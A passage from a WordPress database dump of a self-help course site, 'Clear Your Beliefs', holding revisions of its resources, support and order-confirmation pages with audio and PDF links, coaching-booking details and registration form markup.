Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h1>Bonus Materials:</h1>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;\r\n</div>', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2015-02-18 03:07:53', '2015-02-18 08:07:53', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(2091, 2, '2015-02-18 03:13:35', '2015-02-18 08:13:35', '<div sty;e="margin-left:28px;width:860px;">\r\n<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1></h1>\r\n<h1>The Guidebook</h1>\r\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf">The Clear Your Beliefs Guidebook</a>\r\n(Right-mouse-click and "Save As..." to your computer.\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h1>Bonus Materials:</h1>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;\r\n</div>', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2015-02-18 03:13:35', '2015-02-18 08:13:35', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(2092, 2, '2015-02-18 03:14:15', '2015-02-18 08:14:15', '<div style="margin-left:28px;width:860px;">\r\n<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1></h1>\r\n<h1>The Guidebook</h1>\r\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf">The Clear Your Beliefs Guidebook</a>\r\n(Right-mouse-click and "Save As..." to your computer.\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h1>Bonus Materials:</h1>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;\r\n</div>', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2015-02-18 03:14:15', '2015-02-18 08:14:15', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(2094, 2, '2015-02-28 15:48:17', '2015-02-28 20:48:17', '<h1>Get Support During Your CLEAR YOUR BELIEFS Course</h1>\r\n&nbsp;\r\n\r\n<strong>We are happy to provide you with support while you''re going through the Clear Your Beliefs program.</strong>\r\n\r\nWe offer <strong>one free 15-minute consultation</strong>, which you can use to get help with any issue or question, whether technical or personal.\r\n\r\nSchedule your time below. At the time of your appointment, a <em>Clear Your Beliefs Coach</em> will contact you by phone or Skype. Be sure to provide your Skype address if you are outside the U.S.\r\n\r\nBe available at the time you scheduled. If you do not answer the call at that time, you will forfeit your appointment.\r\n\r\nYour coach will let you know when you''ve used the free 15 minutes. You will then be offered the option of continuing your coaching session for a full hour (another 45 minutes) for only $100, which is half of the prevailing standard CYB Coaching rate. If you choose to continue the call, you can pay the fee via Paypal. Your Coach will give you instructions.\r\n\r\n<strong>Schedule your Free 15-minute Consultation by choosing a date and time below. Then press the “Continue” button.</strong>\r\n\r\nIf you prefer we respond to your questions by email, fill out the contact form below as fully as possible. We will do our best to respond within a few days. (Scheduled phone appointments receive our priority attention.)\r\n\r\n<strong>We look forward to serving you!</strong>\r\n\r\n<iframe src="https://www.timetrade.com/book/DDTDP" width="760" height="683" frameborder="0"></iframe>\r\n<p style="text-align: justify; font-size: 18px; margin-top: 15px;">If you prefer we contact you by email, please fill out this form as fully as possible. We will do our best to respond within a few days (scheduled phone appointments (using the link above) receive our priority attention.</p>\r\n\r\n\r\n<p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/702614ce4d4a54ec6c16fe26b8051013"></script></p>', 'Support', '', 'publish', 'closed', 'open', '', 'support', '', '', '2016-02-01 03:11:39', '2016-02-01 08:11:39', '', 0, 'http://clearyourbeliefs.com/?page_id=2094', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2150, 2, '2015-03-17 21:19:18', '2015-03-18 02:19:18', '<h1>CLEAR YOUR BELIEFS – SUPPORT</h1>\r\n&nbsp;\r\n\r\nWe are happy to provide you with support while you''re going through the Clear Your Beliefs program.\r\n\r\nWe offer one free 15-minute consultation, which you can use to get help with any issue or question, whether technical or personal.\r\n\r\nSchedule your time below. At the time of your appointment, one of our Clear Your Beliefs Coaches will contact you by phone or skype. Be sure to provide your Skype address if you are outside the U.S.\r\n\r\nBe available at the time you scheduled. If you do not answer the call at that time, you will forfeit your appointment.\r\n\r\nYour coach will let you know when you''ve used the free 15 minutes. You will then be offered the option of continuing your coaching session for a full hour (another 45 minutes) for only $100, which is one-half the standard CYB Coaching rate. If you choose to continue the call, you can pay the fee via Paypal. Your Coach will give you instructions.\r\n\r\nSchedule your Free 15-minute Consultation by choosing a date and time below. Then press the “Continue” button.\r\n\r\nIf you prefer we respond to your questions by email, fill out the contact form below as fully as possible. We will do our best to respond within a few days. (Scheduled phone appointments receive our priority attention.)\r\n\r\n<strong>We look forward to serving you!</strong>\r\n\r\n<iframe src="https://www.timetrade.com/book/DDTDP" width="760" height="683" frameborder="0"></iframe>\r\n<p style="text-align: justify; font-size: 18px; margin-top: 15px;">If you prefer we contact you by email, please fill out this form as fully as possible. We will do our best to respond within a few days (scheduled phone appointments (using the link above) receive our priority attention.</p>\r\n\r\n\r\n<p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/702614ce4d4a54ec6c16fe26b8051013"></script></p>', 'Support', '', 'inherit', 'open', 'open', '', '2094-revision-v1', '', '', '2015-03-17 21:19:18', '2015-03-18 02:19:18', '', 2094, 'http://clearyourbeliefs.com/2094-revision-v1/', 0, 'revision', '', 0),
(2145, 2, '2015-03-17 02:10:49', '2015-03-17 07:10:49', 'We are happy to provide you with support while you''re going through the Clear Your Beliefs program.\r\n\r\nWe offer one free 15-minute consultation with one of our certified Clear Your Beliefs Coaches, who can help you with any question, whether technical or personal.\r\n\r\nSchedule your time below. At the time you specify, your coach will contact you by phone or skype (be sure to provide your skype address, especially if you are outside the U.S.). Be available at the time you scheduled. If you do not answer the call at that time, you will forfeit your appointment.\r\n\r\nYour coach will let you know when you''ve used the free 15 minutes. You’ll then be offered the option of continuing the coaching session for a full hour – for another 45 minutes, for only $100, which is one-half our usual rate. If you choose to continue the call, you can pay the fee instantly via Paypal. Your Coach will give you instructions.\r\n\r\nSchedule your Free 15-minute Consultation by choosing a date and time below, then press “Continue.”\r\n\r\nIf you prefer we respond to your questions by email, fill out the contact form below as fully as possible. We will do our best to respond within a few days. (Scheduled phone appointments receive our priority attention.)\r\n\r\nWe look forward to serving you!\r\n<h1></h1>\r\n<h1>Lion Goodman''s Calendar</h1>\r\n<iframe src="https://www.timetrade.com/book/DDTDP" width="760" height="683" frameborder="0"></iframe>\r\n<p style="text-align: justify; font-size: 18px; margin-top: 15px;">If you prefer we contact you by email, please fill out this form as fully as possible. We will do our best to respond within a few days (scheduled phone appointments (using the link above) receive our priority attention.</p>\r\n[Contact Form HERE]\r\n\r\nFirst Name *\r\n\r\nLast Name *\r\n\r\nEmail *\r\n\r\nPhone\r\n\r\nSkype name\r\n\r\nCity\r\n\r\nState\r\n\r\nCountry\r\n\r\nI prefer to be contacted\r\n\r\nby email\r\n\r\nby skype\r\n\r\nby phone\r\n\r\nPreferred time of contact\r\n\r\nmorning\r\n\r\nafternoon\r\n\r\nevening\r\n\r\nI would like support for: *', 'Support', '', 'inherit', 'open', 'open', '', '2094-revision-v1', '', '', '2015-03-17 02:10:49', '2015-03-17 07:10:49', '', 2094, 'http://clearyourbeliefs.com/2094-revision-v1/', 0, 'revision', '', 0),
(2095, 2, '2015-02-28 15:48:17', '2015-02-28 20:48:17', 'We are happy to provide you with support while you''re going through the Clear Your Beliefs program. \r\n\r\nWe offer one free 15-minute consultation with one of our certified Clear Your Beliefs Coaches, who can help you with any question, whether technical or personal.\r\n\r\nSchedule your time below. At the time you specify, your coach will contact you by phone or skype (be sure to provide your skype address, especially if you are outside the U.S.). Be available at the time you scheduled. If you do not answer the call at that time, you will forfeit your appointment.\r\n\r\nYour coach will let you know when you''ve used the free 15 minutes. You’ll then be offered the option of continuing the coaching session for a full hour – for another 45 minutes, for only $100, which is one-half our usual rate.  If you choose to continue the call, you can pay the fee instantly via Paypal.  Your Coach will give you instructions.\r\n\r\nSchedule your Free 15-minute Consultation by choosing a date and time below, then press “Continue.”\r\n\r\nIf you prefer we respond to your questions by email, fill out the contact form below as fully as possible. We will do our best to respond within a few days. (Scheduled phone appointments receive our priority attention.)\r\n\r\n We look forward to serving you!\r\n\r\n[TimeTrade Calendar HERE]\r\n\r\n[Contact Form HERE]\r\n\r\nFirst Name *\r\n\r\nLast Name *\r\n\r\nEmail *\r\n\r\nPhone\r\n\r\nSkype name\r\n\r\nCity\r\n\r\nState\r\n\r\nCountry\r\n\r\nI prefer to be contacted\r\nby email\r\nby skype\r\nby phone\r\n\r\nPreferred time of contact\r\nmorning\r\nafternoon\r\nevening\r\n\r\nI would like support for: *\r\n', 'Support', '', 'inherit', 'closed', 'open', '', '2094-revision-v1', '', '', '2015-02-28 15:48:17', '2015-02-28 20:48:17', '', 2094, 'http://clearyourbeliefs.com/2094-revision-v1', 0, 'revision', '', 0),
(2099, 2, '2015-03-12 22:30:20', '2015-03-13 03:30:20', '<h1 style="text-align: center;">Thank you for your order!</h1>\r\n<h6 style="text-align: center;">Check your email for your confirmation and Access Code.<br />You should receive it within a few minutes.<br />If you don’t, please check your spam folder.</h6>\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/6430086e2fd4ab1d24af175de21dedd2" method="POST">\r\n<h6><input name="inf_form_xid" type="hidden" value="6430086e2fd4ab1d24af175de21dedd2" /><input name="inf_form_name" type="hidden" value="clearyourbeliefs.com/registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.28" /></h6>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City">City *</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodDaysforCoaching0">Good Days for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodDaysforCoaching0" multiple="multiple" name="inf_custom_GoodDaysforCoaching0" size="7"><option value="Monday">Monday</option><option value="Tuesday">Tuesday</option><option value="Wednesday">Wednesday</option><option value="Thursday">Thursday</option><option value="Friday">Friday</option><option value="Saturday">Saturday</option><option value="Sunday">Sunday</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodTimesforCoaching">Good Times for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodTimesforCoaching" multiple="multiple" name="inf_custom_GoodTimesforCoaching" size="4"><option value="Morning (8 am to 11 am)">Morning (8 am to 11 am)</option><option value="Mid-day (11 am to 2 pm)">Mid-day (11 am to 2 pm)</option><option value="Afternoon (2 